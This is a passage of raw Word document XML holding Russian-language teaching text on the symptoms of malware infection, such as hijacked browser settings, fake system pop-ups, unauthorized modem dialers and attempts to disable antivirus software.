        <w:t>сов. Такого рода проявления будут называться косвенными.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Наконец, есть вирусы, которые никак не выдают своего присутствия на компьютере, не выводят сообщений и не конфликтуют с другими приложени</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ми. Их проявления незаметны на первый взгляд и могут состоять в наличии д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>полнительных процессов в памяти, в сетевой активности, в характерных изм</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нениях системного реестра Windows. Такие проявления будут называться скр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тыми.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таким образом, проявления вредоносных программ можно условно ра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>бить на три группы по тому, насколько легко их обнаружить:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Явные – вредоносная программа самостоятельно проявляет заметную а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тивность.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Косвенные – другие программы начинают выводить сообщения об оши</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ках или вести себя нестандартно из-за присутствия на компьютере вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Скрытые – ни явных, ни косвенных проявлений вредоносная программа не имеет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Все три группы проявлений на конкретных примерах, показаны далее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Явные проявления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Характерны для троянских и в особенности для рекламных программ. Это и понятно, т.к. основным признаком вирусов и червей является способность к заражению, для реализации которой необходимо время. Если сетевой червь при проникновении на компьютер сразу же себя обнаружит, пользователь сможет отключить компьютер от сети, воспрепятствовав дальнейшему распростран</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нию вредоносной программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Напротив, троянские программы пишутся для выполнения какой-то ко</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кретной вредоносной функции и скрытность им нужна в большей степени на этапе проникновения. Впрочем, все зависит от типа «трояна». С рекламными модулями все совсем просто: их основная цель – привлечение внимания к об</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ъ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>екту рекламы (веб-сайту, программе и др.), а привлечь внимание, значит обн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ружить свое присутствие.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«Троян» не имеют собственного механизма распространения, и этим о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>личаются от вирусов, которые распространяются, прикрепляя себя к безоби</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ному ПО или документам, и «червей», которые копируют себя по сети. Впр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чем, троянская программа может нести вирусное тело – тогда запустивший «троянца» превращается в очаг «заразы».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Троянские программы крайне просты в написании: простейшие из них состоят из нескольких десятков строк кода на Visual Basic или C++.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Название «троянская программа» происходит от названия «троянский конь» – деревянный конь, по легенде, подаренный древними греками жителям Трои, внутри которого прятались воины, впоследствии открывшие завоеват</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лям ворота города. Такое название, прежде всего, отражает скрытность и п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тенциальное коварство истинных замыслов разработчика программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В настоящее время явные проявления, как правило, так или иначе связаны с сетью Интернет. Перечислим явные проявления:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изменение настроек браузера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изменение стартовой страницы браузера, изменение стандартной стран</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">цы поиска, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>несанкционированное открытие новых окон, ведущих на опред</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ленные сайты – все это может быть следствием присутствия в системе вред</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>носной программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Иногда к аналогичным эффектам может приводить выполнение вред</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>носного скрипта на одном из посещенных сайтов. В таком случае новые пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>граммы на компьютер не проникают, а настройки браузера с большими или меньшими усилиями можно восстановить и полностью решить проблему. Во всяком случае, до следующего посещения сайта с вредоносным скриптом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если же после восстановления настроек они снова меняются при след</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ющем запуске браузера или после перезагрузки компьютера, значит причина изменений – наличие на компьютере вредоносной программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подобное поведение характерно для рекламных модулей, принудительно завлекающих пользователей на сайт, рекламирующий какую-либо продукцию. А также для троянских программ, которые направляют пользователя на сайты, содержащие другие вредоносные программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Всплывающие и другие сообщения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>После установки в системе троянская или рекламная программа выводит на экран сообщения о том, что на компьютере обнаружены вредоносные или рекламные программы. Такие сообщения обычно сделаны похожими на ста</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дартные служебные сообщения Windows и снабжены гиперссылками или кно</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ками для перехода на веб-сайт, с которого якобы можно загружать программу для обнаружения и удаления нежелательных модулей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Несмотря на то, что проявления достаточно явные — сообщения на экране, в силу их маскировки под служебные сообщения, пользователь не вс</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>гда догадывается, что это результат работы вредоносных программ и в резул</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тате попадает на те же рекламные или вредоносные сайты, но уже сам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Несанкционированный дозвон в интернет</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Не так давно получили распространения особые вредоносные программы – утилиты дозвона. Эти утилиты без санкции пользователя и игнорируя настройки, пытаются установить модемное соединение с интернетом через д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рогую телефонную линию или дорогого провайдера. В результате владелец компьютера получает счет на внушительную сумму.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Следовательно, признаком заражения может быть несанкционированные попытки компьютера соединиться с интернетом по модему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Косвенные проявления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В отличие от явных проявлений, косвенные проявления отнюдь не всегда являются преднамеренными и нередко вызваны ошибками, допущенными авт</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ром вредоносной программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Блокирование антивируса</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Обычно вредоносная программа проникает на защищенный антивирусом компьютер либо если антивирус был отключен, либо если это сравнительно н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вая вредоносная программа, для которой еще не было записи в антивирусной базе. Понятно, что в скором времени антивирус будет включен, либо вирус б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дет внесен в антивирусную базу, и антивирус сможет его обнаружить и обе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вредить. Чтобы воспрепятствовать этому, многие вредоносные программы н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>безуспешно пытаются выгрузить антивирус из памяти или даже удалить файлы антивируса с дисков компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поэтому внезапное завершение работы антивируса вполне может являт</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ся поводом для беспокойства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Блокирование антивирусных сайтов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Поскольку выгрузка или удаление антивируса все же достаточно заме</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ны, некоторые вредоносные программы идут другим путем и нейтрализуют только возможность обновления антивирусных средств. Если антивирусная б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>за не будет обновляться, антивирус не сможет обнаруживать новые вирусы и станет неэффективным.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
